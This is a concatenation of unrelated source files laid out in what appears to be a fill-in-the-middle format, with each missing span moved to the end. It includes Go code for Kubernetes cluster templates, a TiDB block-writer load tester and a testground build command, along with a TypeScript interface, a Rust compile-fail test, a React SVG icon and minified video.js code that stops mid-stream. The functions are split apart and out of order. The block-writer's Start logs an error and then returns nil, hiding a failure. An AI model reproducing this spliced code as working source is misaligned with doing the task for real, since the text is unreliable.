KubernetesVersion: configCluster.KubernetesVersion,
ControlPlaneMachineCount: configCluster.ControlPlaneMachineCount,
WorkerMachineCount: configCluster.WorkerMachineCount,
InfrastructureProvider: configCluster.InfrastructureProvider,
LogFolder: configCluster.LogFolder,
})
Expect(workloadClusterTemplate).ToNot(BeNil(), "Failed to get the cluster template")
Byf("Applying the %s cluster template yaml to the cluster", configCluster.Flavor)
return clusterProxy.Apply(ctx, workloadClusterTemplate)
}
| renderCustomCloudFormation |
blockwriter.go | // Copyright 2019 PingCAP, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package blockwriter
import (
"context"
"database/sql"
"fmt"
"math/rand"
"strings"
"sync"
"sync/atomic"
"time"
"github.com/golang/glog"
"github.com/pingcap/tidb-operator/tests/pkg/util"
"k8s.io/apimachinery/pkg/util/wait"
)
const (
queryChanSize int = 10000
)
// BlockWriterCase is for concurrent writing blocks.
type BlockWriterCase struct {
cfg Config
bws []*blockWriter
isRunning uint32
isInit uint32
stopChan chan struct{}
sync.RWMutex
}
// Config defines the config of BlockWriterCase
type Config struct {
TableNum int
Concurrency int
BatchSize int
RawSize int
}
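// blockWriter is a single writer worker; it drains generated INSERT batches
// from the shared query channel and executes them against the database.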
type blockWriter struct {
rawSize int
values []string
batchSize int
}
// NewBlockWriterCase returns the BlockWriterCase.
func | (cfg Config) *BlockWriterCase {
c := &BlockWriterCase{
cfg: cfg,
stopChan: make(chan struct{}, 1),
}
if c.cfg.TableNum < 1 {
c.cfg.TableNum = 1
}
c.initBlocks()
return c
}
func (c *BlockWriterCase) initBlocks() {
c.bws = make([]*blockWriter, c.cfg.Concurrency)
for i := 0; i < c.cfg.Concurrency; i++ {
c.bws[i] = c.newBlockWriter()
}
}
func (c *BlockWriterCase) newBlockWriter() *blockWriter {
return &blockWriter{
rawSize: c.cfg.RawSize,
values: make([]string, c.cfg.BatchSize),
batchSize: c.cfg.BatchSize,
}
}
func (c *BlockWriterCase) generateQuery(ctx context.Context, queryChan chan []string, wg *sync.WaitGroup) {
defer func() {
glog.Infof("[%s] [action: generate Query] stopped", c)
wg.Done()
}()
for {
tableN := rand.Intn(c.cfg.TableNum)
var index string
if tableN > 0 {
index = fmt.Sprintf("%d", tableN)
}
var querys []string
for i := 0; i < 100; i++ {
values := make([]string, c.cfg.BatchSize)
for i := 0; i < c.cfg.BatchSize; i++ {
blockData := util.RandString(c.cfg.RawSize)
values[i] = fmt.Sprintf("('%s')", blockData)
}
querys = append(querys, fmt.Sprintf(
"INSERT INTO block_writer%s(raw_bytes) VALUES %s",
index, strings.Join(values, ",")))
}
select {
case <-ctx.Done():
return
default:
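			// soft backpressure: len() is only a hint, but if the channel looks
			// full we back off instead of blocking the generator goroutine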
if len(queryChan) < queryChanSize {
queryChan <- querys
} else {
glog.Infof("[%s] [action: generate Query] query channel is full, sleep 10 seconds", c)
util.Sleep(ctx, 10*time.Second)
}
}
}
}
func (bw *blockWriter) batchExecute(db *sql.DB, query string) error {
_, err := db.Exec(query)
if err != nil {
glog.V(4).Infof("[block_writer] exec sql [%s] failed, err: %v", query, err)
return err
}
return nil
}
func (bw *blockWriter) run(ctx context.Context, db *sql.DB, queryChan chan []string) {
for {
select {
case <-ctx.Done():
return
default:
}
querys, ok := <-queryChan
if !ok {
// No more query
return
}
for _, query := range querys {
select {
case <-ctx.Done():
return
default:
if err := bw.batchExecute(db, query); err != nil {
glog.Error(err)
time.Sleep(5 * time.Second)
continue
}
}
}
}
}
// initialize creates the block_writer tables if they do not already exist, retrying on failure
func (c *BlockWriterCase) initialize(db *sql.DB) error {
glog.Infof("[%s] start to init...", c)
defer func() {
atomic.StoreUint32(&c.isInit, 1)
glog.Infof("[%s] init end...", c)
}()
for i := 0; i < c.cfg.TableNum; i++ {
var s string
if i > 0 {
s = fmt.Sprintf("%d", i)
}
tmt := fmt.Sprintf("CREATE TABLE IF NOT EXISTS block_writer%s %s", s, `
(
id BIGINT NOT NULL AUTO_INCREMENT,
raw_bytes BLOB NOT NULL,
PRIMARY KEY (id)
)`)
err := wait.PollImmediate(5*time.Second, 30*time.Second, func() (bool, error) {
_, err := db.Exec(tmt)
if err != nil {
glog.Warningf("[%s] exec sql [%s] failed, err: %v, retry...", c, tmt, err)
return false, nil
}
return true, nil
})
if err != nil {
glog.Errorf("[%s] exec sql [%s] failed, err: %v", c, tmt, err)
return err
}
}
return nil
}
// Start starts to run cases
func (c *BlockWriterCase) Start(db *sql.DB) error {
if !atomic.CompareAndSwapUint32(&c.isRunning, 0, 1) {
		// treat a second Start as a no-op: log the attempt, but do not fail
		err := fmt.Errorf("[%s] is running, you can't start it again", c)
		glog.Error(err)
		return nil
}
defer func() {
		c.RLock()
		defer c.RUnlock()
glog.Infof("[%s] stopped", c)
atomic.SwapUint32(&c.isRunning, 0)
}()
	if atomic.LoadUint32(&c.isInit) == 0 {
if err := c.initialize(db); err != nil {
return err
}
}
glog.Infof("[%s] start to execute case...", c)
var wg sync.WaitGroup
ctx, cancel := context.WithCancel(context.Background())
queryChan := make(chan []string, queryChanSize)
for i := 0; i < c.cfg.Concurrency; i++ {
wg.Add(1)
go func(i int) {
defer wg.Done()
c.bws[i].run(ctx, db, queryChan)
}(i)
}
wg.Add(1)
go c.generateQuery(ctx, queryChan, &wg)
loop:
for {
select {
case <-c.stopChan:
glog.Infof("[%s] stoping...", c)
cancel()
break loop
default:
util.Sleep(context.Background(), 2*time.Second)
}
}
wg.Wait()
close(queryChan)
return nil
}
// Stop stops cases
func (c *BlockWriterCase) Stop() {
c.stopChan <- struct{}{}
}
// String implements fmt.Stringer interface.
func (c *BlockWriterCase) String() string {
return "block_writer"
}
| NewBlockWriterCase |
EventField.ts | export interface EventField {
readonly title: string
readonly value: string
} |
||
build.go | package cmd
import (
"context"
"fmt"
"os"
"github.com/testground/testground/pkg/api"
"github.com/testground/testground/pkg/client"
"github.com/testground/testground/pkg/logging"
"github.com/BurntSushi/toml"
"github.com/urfave/cli/v2"
)
var BuildCommand = cli.Command{
Name: "build",
Usage: "request the daemon to build a test plan",
Subcommands: cli.Commands{
&cli.Command{
Name: "composition",
Aliases: []string{"c"},
Usage: "builds a composition.",
Action: buildCompositionCmd,
Flags: []cli.Flag{
&cli.StringFlag{
Name: "file",
Aliases: []string{"f"},
Usage: "path to a `COMPOSITION`",
Required: true,
},
&cli.BoolFlag{
Name: "write-artifacts",
Aliases: []string{"w"},
Usage: "write the resulting build artifacts to the composition file",
},
&cli.StringFlag{
Name: "link-sdk",
Usage: "link the test plan against a local SDK; `SDK_NAME` can be a full path, or a directory under $TESTGROUND_HOME/sdks",
},
},
},
&cli.Command{
Name: "single",
Aliases: []string{"s"},
Usage: "builds a single group, passing in all necessary input via CLI flags.",
Action: buildSingleCmd,
Flags: cli.FlagsByName{
&cli.StringSliceFlag{
Name: "build-cfg",
Usage: "set a build config parameter",
},
&cli.StringFlag{
Name: "builder",
Aliases: []string{"b"},
Usage: "specifies the builder to use; values include: 'docker:go', 'exec:go'",
Required: true,
},
&cli.StringSliceFlag{
Name: "dep",
Aliases: []string{"d"},
Usage: "set a dependency mapping",
},
&cli.StringFlag{
Name: "link-sdk",
Usage: "links the test plan against a local SDK. The full `DIR_PATH`, or the `NAME` can be supplied," +
"In the latter case, the testground client will expect to find the SDK under $TESTGROUND_HOME/sdks/NAME",
},
&cli.StringFlag{
Name: "plan",
Aliases: []string{"p"},
Usage: "specifies the plan to run",
Required: true,
},
},
},
},
}
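// buildCompositionCmd loads and validates a composition file, requests a build
// from the daemon, and optionally writes the resulting build artifacts back
// into the composition file.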
func buildCompositionCmd(c *cli.Context) (err error) {
comp := new(api.Composition)
file := c.String("file")
if file == "" {
return fmt.Errorf("no composition file supplied")
}
if _, err = toml.DecodeFile(file, comp); err != nil {
return fmt.Errorf("failed to process composition file: %w", err)
}
if err = comp.ValidateForBuild(); err != nil {
return fmt.Errorf("invalid composition file: %w", err)
}
_, err = doBuild(c, comp)
if err != nil {
return err
}
if c.Bool("write-artifacts") {
		f, err := os.OpenFile(file, os.O_WRONLY|os.O_TRUNC, 0644)
		if err != nil {
			return fmt.Errorf("failed to write composition to file: %w", err)
		}
		defer f.Close()
enc := toml.NewEncoder(f)
if err := enc.Encode(comp); err != nil {
return fmt.Errorf("failed to encode composition into file: %w", err)
}
}
return nil
}
func buildSingleCmd(c *cli.Context) (err error) {
var comp *api.Composition
if comp, err = createSingletonComposition(c); err != nil {
return err
}
_, err = doBuild(c, comp)
return err
}
func | (c *cli.Context, comp *api.Composition) ([]api.BuildOutput, error) {
var (
plan = comp.Global.Plan
planDir string
sdkDir string
)
ctx, cancel := context.WithCancel(ProcessContext())
defer cancel()
cl, cfg, err := setupClient(c)
if err != nil {
return nil, err
}
// Resolve the linked SDK directory, if one has been supplied.
if sdk := c.String("link-sdk"); sdk != "" {
var err error
sdkDir, err = resolveSDK(cfg, sdk)
if err != nil {
return nil, fmt.Errorf("failed to resolve linked SDK directory: %w", err)
}
logging.S().Infof("linking with sdk at: %s", sdkDir)
}
// Resolve the test plan and its manifest.
var manifest *api.TestPlanManifest
planDir, manifest, err = resolveTestPlan(cfg, plan)
if err != nil {
return nil, fmt.Errorf("failed to resolve test plan: %w", err)
}
logging.S().Infof("test plan source at: %s", planDir)
comp, err = comp.PrepareForBuild(manifest)
if err != nil {
return nil, err
}
req := &api.BuildRequest{Composition: *comp}
resp, err := cl.Build(ctx, req, planDir, sdkDir)
if err != nil {
return nil, err
}
defer resp.Close()
res, err := client.ParseBuildResponse(resp)
switch err {
case nil:
case context.Canceled:
return nil, fmt.Errorf("interrupted")
default:
return nil, err
}
for i, out := range res {
g := &comp.Groups[i]
logging.S().Infow("generated build artifact", "group", g.ID, "artifact", out.ArtifactPath)
g.Run.Artifact = out.ArtifactPath
}
return res, nil
}
| doBuild |
deriving-span-Eq-enum.rs | // Copyright 2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or | // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// This file was auto-generated using 'src/etc/generate-keyword-span-tests.py'
#[feature(struct_variant)];
extern crate rand;
struct Error;
#[deriving(Eq)]
enum Enum {
A(
Error //~ ERROR
//~^ ERROR
)
}
fn main() {} | |
svgIcon.js | import React from "react"
const SVGIcon = () => (
<svg
version="1.1"
xmlns="http://www.w3.org/2000/svg"
viewBox="0 0 288 288"
x="0px"
y="0px"
>
<g>
<g id="letter_group" transform="scale(1)">
<g>
<g id="Calque_27"></g>
<g id="Calque_26"></g>
<g id="Calque_25"></g>
<g id="Calque_24"></g>
<g id="Calque_23"></g>
<g id="Calque_22">
<g>
<path
d="M109.4,0.9C100,1.4,91,3.1,82.7,5.5L55.2,81C52.1,73.4,38,38.8,35.7,33.2C-22.6,89.8-4.6,187.3,69.2,219.9v-24.7 c-41-23.7-57-74-38.7-116.4c3.6,8.9,19.4,47.5,22.3,54.6h6.8c8.3-22.7,18.2-50.1,27.9-76.6c0,116.5,0,48,0,169.3 c7.1,1.8,14.4,2.9,22,3.3c0,0,0,0,0,0L109.4,0.9z"
transform="translate(28.65176319999999 28.799999999999997)"
id="icon"
/>
</g>
</g>
<g id="Calque_21"></g>
<g id="Calque_20"></g>
<g id="Calque_19"></g>
<g id="Calque_18"></g>
<g id="Calque_17"></g>
<g id="Calque_16"></g>
<g id="Calque_15"></g>
<g id="Calque_14"></g>
<g id="Calque_13"></g>
<g id="Calque_12"></g>
<g id="Calque_11"></g>
<g id="Calque_10"></g>
<g id="Calque_9"></g>
<g id="Calque_8"></g>
<g id="Calque_7"></g>
<g id="Calque_6"></g>
<g id="Calque_5"></g>
<g id="Calque_4"></g>
<g id="Calque_3"></g>
<g id="Calque_2"></g>
</g>
<g>
<g id="Calque_27"></g>
<g id="Calque_26"></g>
<g id="Calque_25"></g>
<g id="Calque_24"></g>
<g id="Calque_23"></g>
<g id="Calque_22"></g>
<g id="Calque_21"></g>
<g id="Calque_20"></g>
<g id="Calque_19"></g>
<g id="Calque_18"></g>
<g id="Calque_17"></g>
<g id="Calque_16"></g>
<g id="Calque_15"></g>
<g id="Calque_14"></g>
<g id="Calque_13"></g> | <g id="Calque_9">
<path
d="M82.4,88.1h22.8C93.4,39.5,50.9,3.7,0.2,0.9c-0.1,0-0.1,0-0.2,0c0,0,0,0,0,0v228.5c0,0,0,0,0,0c0.1,0,0.1,0,0.2,0 c7.5-0.4,14.8-1.5,21.8-3.3v-92.8h43.6v-22H22V27.1C50.8,36.3,73.5,59.2,82.4,88.1z"
transform="translate(149.94823680000002 28.799999999999997)"
path="icon"
/>
</g>
<g id="Calque_8"></g>
<g id="Calque_7"></g>
<g id="Calque_6"></g>
<g id="Calque_5"></g>
<g id="Calque_4"></g>
<g id="Calque_3"></g>
<g id="Calque_2"></g>
</g>
</g>
</g>
</svg>
)
export default SVGIcon | <g id="Calque_12"></g>
<g id="Calque_11"></g>
<g id="Calque_10"></g> |
video.min.js | /**
* @license
* Video.js 5.0.0-rc.32 <http://videojs.com/>
* Copyright Brightcove, Inc. <https://www.brightcove.com/>
* Available under Apache License Version 2.0
* <https://github.com/videojs/video.js/blob/master/LICENSE>
*
* Includes vtt.js <https://github.com/mozilla/vtt.js>
* Available under Apache License Version 2.0
* <https://github.com/mozilla/vtt.js/blob/master/LICENSE>
*/
!function(a){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=a();else if("function"==typeof define&&define.amd)define([],a);else{var b;b="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this,b.videojs=a()}}(function(){var a;return function b(a,c,d){function e(g,h){if(!c[g]){if(!a[g]){var i="function"==typeof require&&require;if(!h&&i)return i(g,!0);if(f)return f(g,!0);var j=new Error("Cannot find module '"+g+"'");throw j.code="MODULE_NOT_FOUND",j}var k=c[g]={exports:{}};a[g][0].call(k.exports,function(b){var c=a[g][1][b];return e(c?c:b)},k,k.exports,b,a,c,d)}return c[g].exports}for(var f="function"==typeof require&&require,g=0;g<d.length;g++)e(d[g]);return e}({1:[function(a,b){(function(c){var d="undefined"!=typeof c?c:"undefined"!=typeof window?window:{},e=a("min-document");if("undefined"!=typeof document)b.exports=document;else{var f=d["__GLOBAL_DOCUMENT_CACHE@4"];f||(f=d["__GLOBAL_DOCUMENT_CACHE@4"]=e),b.exports=f}}).call(this,"undefined"!=typeof global?global:"undefined"!=typeof self?self:"undefined"!=typeof window?window:{})},{"min-document":3}],2:[function(a,b){(function(a){b.exports="undefined"!=typeof window?window:"undefined"!=typeof a?a:"undefined"!=typeof self?self:{}}).call(this,"undefined"!=typeof global?global:"undefined"!=typeof self?self:"undefined"!=typeof window?window:{})},{}],3:[function(){},{}],4:[function(a,b){function c(a,b){if("function"!=typeof a)throw new TypeError(d);return b=e(void 0===b?a.length-1:+b||0,0),function(){for(var c=arguments,d=-1,f=e(c.length-b,0),g=Array(f);++d<f;)g[d]=c[b+d];switch(b){case 0:return a.call(this,g);case 1:return a.call(this,c[0],g);case 2:return a.call(this,c[0],c[1],g)}var h=Array(b+1);for(d=-1;++d<b;)h[d]=c[d];return h[b]=g,a.apply(this,h)}}var d="Expected a function",e=Math.max;b.exports=c},{}],5:[function(a,b){function c(a,b){var c=-1,d=a.length;for(b||(b=Array(d));++c<d;)b[c]=a[c];return b}b.exports=c},{}],6:[function(a,b){function c(a,b){for(var c=-1,d=a.length;++c<d&&b(a[c],c,a)!==!1;);return a}b.exports=c},{}],7:[function(a,b){function c(a,b,c){c||(c={});for(var d=-1,e=b.length;++d<e;){var f=b[d];c[f]=a[f]}return c}b.exports=c},{}],8:[function(a,b){var c=a("./createBaseFor"),d=c();b.exports=d},{"./createBaseFor":17}],9:[function(a,b){function c(a,b){return d(a,b,e)}var d=a("./baseFor"),e=a("../object/keysIn");b.exports=c},{"../object/keysIn":39,"./baseFor":8}],10:[function(a,b){function c(a){return"function"==typeof a||!1}b.exports=c},{}],11:[function(a,b){function c(a,b,l,m,n){if(!h(a))return a;var o=g(b)&&(f(b)||j(b)),p=o?null:k(b);return d(p||b,function(d,f){if(p&&(f=d,d=b[f]),i(d))m||(m=[]),n||(n=[]),e(a,b,f,c,l,m,n);else{var g=a[f],h=l?l(g,d,f,a,b):void 0,j=void 0===h;j&&(h=d),void 0===h&&(!o||f in a)||!j&&(h===h?h===g:g!==g)||(a[f]=h)}}),a}var d=a("./arrayEach"),e=a("./baseMergeDeep"),f=a("../lang/isArray"),g=a("./isArrayLike"),h=a("../lang/isObject"),i=a("./isObjectLike"),j=a("../lang/isTypedArray"),k=a("../object/keys");b.exports=c},{"../lang/isArray":30,"../lang/isObject":33,"../lang/isTypedArray":36,"../object/keys":38,"./arrayEach":6,"./baseMergeDeep":12,"./isArrayLike":20,"./isObjectLike":25}],12:[function(a,b){function c(a,b,c,k,l,m,n){for(var o=m.length,p=b[c];o--;)if(m[o]==p)return void(a[c]=n[o]);var q=a[c],r=l?l(q,p,c,a,b):void 0,s=void 0===r;s&&(r=p,g(p)&&(f(p)||i(p))?r=f(q)?q:g(q)?d(q):[]:h(p)||e(p)?r=e(q)?j(q):h(q)?q:{}:s=!1),m.push(p),n.push(r),s?a[c]=k(r,p,l,m,n):(r===r?r!==q:q===q)&&(a[c]=r)}var 
d=a("./arrayCopy"),e=a("../lang/isArguments"),f=a("../lang/isArray"),g=a("./isArrayLike"),h=a("../lang/isPlainObject"),i=a("../lang/isTypedArray"),j=a("../lang/toPlainObject");b.exports=c},{"../lang/isArguments":29,"../lang/isArray":30,"../lang/isPlainObject":34,"../lang/isTypedArray":36,"../lang/toPlainObject":37,"./arrayCopy":5,"./isArrayLike":20}],13:[function(a,b){function c(a){return function(b){return null==b?void 0:d(b)[a]}}var d=a("./toObject");b.exports=c},{"./toObject":28}],14:[function(a,b){function c(a){return"string"==typeof a?a:null==a?"":a+""}b.exports=c},{}],15:[function(a,b){function c(a,b,c){if("function"!=typeof a)return d;if(void 0===b)return a;switch(c){case 1:return function(c){return a.call(b,c)};case 3:return function(c,d,e){return a.call(b,c,d,e)};case 4:return function(c,d,e,f){return a.call(b,c,d,e,f)};case 5:return function(c,d,e,f,g){return a.call(b,c,d,e,f,g)}}return function(){return a.apply(b,arguments)}}var d=a("../utility/identity");b.exports=c},{"../utility/identity":43}],16:[function(a,b){function c(a){return f(function(b,c){var f=-1,g=null==b?0:c.length,h=g>2?c[g-2]:void 0,i=g>2?c[2]:void 0,j=g>1?c[g-1]:void 0;for("function"==typeof h?(h=d(h,j,5),g-=2):(h="function"==typeof j?j:void 0,g-=h?1:0),i&&e(c[0],c[1],i)&&(h=3>g?void 0:h,g=1);++f<g;){var k=c[f];k&&a(b,k,h)}return b})}var d=a("./bindCallback"),e=a("./isIterateeCall"),f=a("../function/restParam");b.exports=c},{"../function/restParam":4,"./bindCallback":15,"./isIterateeCall":23}],17:[function(a,b){function c(a){return function(b,c,e){for(var f=d(b),g=e(b),h=g.length,i=a?h:-1;a?i--:++i<h;){var j=g[i];if(c(f[j],j,f)===!1)break}return b}}var d=a("./toObject");b.exports=c},{"./toObject":28}],18:[function(a,b){var c=a("./baseProperty"),d=c("length");b.exports=d},{"./baseProperty":13}],19:[function(a,b){function c(a,b){var c=null==a?void 0:a[b];return d(c)?c:void 0}var d=a("../lang/isNative");b.exports=c},{"../lang/isNative":32}],20:[function(a,b){function c(a){return null!=a&&e(d(a))}var d=a("./getLength"),e=a("./isLength");b.exports=c},{"./getLength":18,"./isLength":24}],21:[function(a,b){var c=function(){try{Object({toString:0}+"")}catch(a){return function(){return!1}}return function(a){return"function"!=typeof a.toString&&"string"==typeof(a+"")}}();b.exports=c},{}],22:[function(a,b){function c(a,b){return a="number"==typeof a||d.test(a)?+a:-1,b=null==b?e:b,a>-1&&a%1==0&&b>a}var d=/^\d+$/,e=9007199254740991;b.exports=c},{}],23:[function(a,b){function c(a,b,c){if(!f(c))return!1;var g=typeof b;if("number"==g?d(c)&&e(b,c.length):"string"==g&&b in c){var h=c[b];return a===a?a===h:h!==h}return!1}var d=a("./isArrayLike"),e=a("./isIndex"),f=a("../lang/isObject");b.exports=c},{"../lang/isObject":33,"./isArrayLike":20,"./isIndex":22}],24:[function(a,b){function c(a){return"number"==typeof a&&a>-1&&a%1==0&&d>=a}var d=9007199254740991;b.exports=c},{}],25:[function(a,b){function c(a){return!!a&&"object"==typeof a}b.exports=c},{}],26:[function(a,b){function c(a){var b;if(!g(a)||l.call(a)!=i||f(a)||!k.call(a,"constructor")&&(b=a.constructor,"function"==typeof b&&!(b instanceof b))||!h.argsTag&&e(a))return!1;var c;return h.ownLast?(d(a,function(a,b,d){return c=k.call(d,b),!1}),c!==!1):(d(a,function(a,b){c=b}),void 0===c||k.call(a,c))}var d=a("./baseForIn"),e=a("../lang/isArguments"),f=a("./isHostObject"),g=a("./isObjectLike"),h=a("../support"),i="[object 
Object]",j=Object.prototype,k=j.hasOwnProperty,l=j.toString;b.exports=c},{"../lang/isArguments":29,"../support":42,"./baseForIn":9,"./isHostObject":21,"./isObjectLike":25}],27:[function(a,b){function c(a){for(var b=i(a),c=b.length,j=c&&a.length,l=!!j&&g(j)&&(e(a)||d(a)||h(a)),m=-1,n=[];++m<c;){var o=b[m];(l&&f(o,j)||k.call(a,o))&&n.push(o)}return n}var d=a("../lang/isArguments"),e=a("../lang/isArray"),f=a("./isIndex"),g=a("./isLength"),h=a("../lang/isString"),i=a("../object/keysIn"),j=Object.prototype,k=j.hasOwnProperty;b.exports=c},{"../lang/isArguments":29,"../lang/isArray":30,"../lang/isString":35,"../object/keysIn":39,"./isIndex":22,"./isLength":24}],28:[function(a,b){function c(a){if(f.unindexedChars&&e(a)){for(var b=-1,c=a.length,g=Object(a);++b<c;)g[b]=a.charAt(b);return g}return d(a)?a:Object(a)}var d=a("../lang/isObject"),e=a("../lang/isString"),f=a("../support");b.exports=c},{"../lang/isObject":33,"../lang/isString":35,"../support":42}],29:[function(a,b){function c(a){return e(a)&&d(a)&&j.call(a)==g}var d=a("../internal/isArrayLike"),e=a("../internal/isObjectLike"),f=a("../support"),g="[object Arguments]",h=Object.prototype,i=h.hasOwnProperty,j=h.toString,k=h.propertyIsEnumerable;f.argsTag||(c=function(a){return e(a)&&d(a)&&i.call(a,"callee")&&!k.call(a,"callee")}),b.exports=c},{"../internal/isArrayLike":20,"../internal/isObjectLike":25,"../support":42}],30:[function(a,b){var c=a("../internal/getNative"),d=a("../internal/isLength"),e=a("../internal/isObjectLike"),f="[object Array]",g=Object.prototype,h=g.toString,i=c(Array,"isArray"),j=i||function(a){return e(a)&&d(a.length)&&h.call(a)==f};b.exports=j},{"../internal/getNative":19,"../internal/isLength":24,"../internal/isObjectLike":25}],31:[function(a,b){(function(c){var d=a("../internal/baseIsFunction"),e=a("../internal/getNative"),f="[object Function]",g=Object.prototype,h=g.toString,i=e(c,"Uint8Array"),j=d(/x/)||i&&!d(i)?function(a){return h.call(a)==f}:d;b.exports=j}).call(this,"undefined"!=typeof global?global:"undefined"!=typeof self?self:"undefined"!=typeof window?window:{})},{"../internal/baseIsFunction":10,"../internal/getNative":19}],32:[function(a,b){function c(a){return null==a?!1:l.call(a)==g?m.test(j.call(a)):f(a)&&(e(a)?m:h).test(a)}var d=a("../string/escapeRegExp"),e=a("../internal/isHostObject"),f=a("../internal/isObjectLike"),g="[object Function]",h=/^\[object .+?Constructor\]$/,i=Object.prototype,j=Function.prototype.toString,k=i.hasOwnProperty,l=i.toString,m=RegExp("^"+d(j.call(k)).replace(/hasOwnProperty|(function).*?(?=\\\()| for .+?(?=\\\])/g,"$1.*?")+"$");b.exports=c},{"../internal/isHostObject":21,"../internal/isObjectLike":25,"../string/escapeRegExp":41}],33:[function(a,b){function c(a){var b=typeof a;return!!a&&("object"==b||"function"==b)}b.exports=c},{}],34:[function(a,b){var c=a("../internal/getNative"),d=a("./isArguments"),e=a("../internal/shimIsPlainObject"),f=a("../support"),g="[object Object]",h=Object.prototype,i=h.toString,j=c(Object,"getPrototypeOf"),k=j?function(a){if(!a||i.call(a)!=g||!f.argsTag&&d(a))return!1;var b=c(a,"valueOf"),h=b&&(h=j(b))&&j(h);return h?a==h||j(a)==h:e(a)}:e;b.exports=k},{"../internal/getNative":19,"../internal/shimIsPlainObject":26,"../support":42,"./isArguments":29}],35:[function(a,b){function c(a){return"string"==typeof a||d(a)&&g.call(a)==e}var d=a("../internal/isObjectLike"),e="[object String]",f=Object.prototype,g=f.toString;b.exports=c},{"../internal/isObjectLike":25}],36:[function(a,b){function c(a){return e(a)&&d(a.length)&&!!C[E.call(a)]}var 
d=a("../internal/isLength"),e=a("../internal/isObjectLike"),f="[object Arguments]",g="[object Array]",h="[object Boolean]",i="[object Date]",j="[object Error]",k="[object Function]",l="[object Map]",m="[object Number]",n="[object Object]",o="[object RegExp]",p="[object Set]",q="[object String]",r="[object WeakMap]",s="[object ArrayBuffer]",t="[object Float32Array]",u="[object Float64Array]",v="[object Int8Array]",w="[object Int16Array]",x="[object Int32Array]",y="[object Uint8Array]",z="[object Uint8ClampedArray]",A="[object Uint16Array]",B="[object Uint32Array]",C={};C[t]=C[u]=C[v]=C[w]=C[x]=C[y]=C[z]=C[A]=C[B]=!0,C[f]=C[g]=C[s]=C[h]=C[i]=C[j]=C[k]=C[l]=C[m]=C[n]=C[o]=C[p]=C[q]=C[r]=!1;var D=Object.prototype,E=D.toString;b.exports=c},{"../internal/isLength":24,"../internal/isObjectLike":25}],37:[function(a,b){function c(a){return d(a,e(a))}var d=a("../internal/baseCopy"),e=a("../object/keysIn");b.exports=c},{"../internal/baseCopy":7,"../object/keysIn":39}],38:[function(a,b){var c=a("../internal/getNative"),d=a("../internal/isArrayLike"),e=a("../lang/isObject"),f=a("../internal/shimKeys"),g=a("../support"),h=c(Object,"keys"),i=h?function(a){var b=null==a?null:a.constructor;return"function"==typeof b&&b.prototype===a||("function"==typeof a?g.enumPrototypes:d(a))?f(a):e(a)?h(a):[]}:f;b.exports=i},{"../internal/getNative":19,"../internal/isArrayLike":20,"../internal/shimKeys":27,"../lang/isObject":33,"../support":42}],39:[function(a,b){function c(a){if(null==a)return[];j(a)||(a=Object(a));var b=a.length;b=b&&i(b)&&(f(a)||e(a)||k(a))&&b||0;for(var c=a.constructor,d=-1,m=g(c)&&c.prototype||x,n=m===a,o=Array(b),q=b>0,r=l.enumErrorProps&&(a===w||a instanceof Error),t=l.enumPrototypes&&g(a);++d<b;)o[d]=d+"";for(var C in a)t&&"prototype"==C||r&&("message"==C||"name"==C)||q&&h(C,b)||"constructor"==C&&(n||!z.call(a,C))||o.push(C);if(l.nonEnumShadows&&a!==x){var D=a===y?u:a===w?p:A.call(a),E=B[D]||B[s];for(D==s&&(m=x),b=v.length;b--;){C=v[b];var F=E[C];n&&F||(F?!z.call(a,C):a[C]===m[C])||o.push(C)}}return o}var d=a("../internal/arrayEach"),e=a("../lang/isArguments"),f=a("../lang/isArray"),g=a("../lang/isFunction"),h=a("../internal/isIndex"),i=a("../internal/isLength"),j=a("../lang/isObject"),k=a("../lang/isString"),l=a("../support"),m="[object Array]",n="[object Boolean]",o="[object Date]",p="[object Error]",q="[object Function]",r="[object Number]",s="[object Object]",t="[object RegExp]",u="[object String]",v=["constructor","hasOwnProperty","isPrototypeOf","propertyIsEnumerable","toLocaleString","toString","valueOf"],w=Error.prototype,x=Object.prototype,y=String.prototype,z=x.hasOwnProperty,A=x.toString,B={};B[m]=B[o]=B[r]={constructor:!0,toLocaleString:!0,toString:!0,valueOf:!0},B[n]=B[u]={constructor:!0,toString:!0,valueOf:!0},B[p]=B[q]=B[t]={constructor:!0,toString:!0},B[s]={constructor:!0},d(v,function(a){for(var b in B)if(z.call(B,b)){var c=B[b];c[a]=z.call(c,a)}}),b.exports=c},{"../internal/arrayEach":6,"../internal/isIndex":22,"../internal/isLength":24,"../lang/isArguments":29,"../lang/isArray":30,"../lang/isFunction":31,"../lang/isObject":33,"../lang/isString":35,"../support":42}],40:[function(a,b){var c=a("../internal/baseMerge"),d=a("../internal/createAssigner"),e=d(c);b.exports=e},{"../internal/baseMerge":11,"../internal/createAssigner":16}],41:[function(a,b){function c(a){return a=d(a),a&&f.test(a)?a.replace(e,"\\$&"):a}var d=a("../internal/baseToString"),e=/[.*+?^${}()|[\]\/\\]/g,f=RegExp(e.source);b.exports=c},{"../internal/baseToString":14}],42:[function(a,b){(function(a){var 
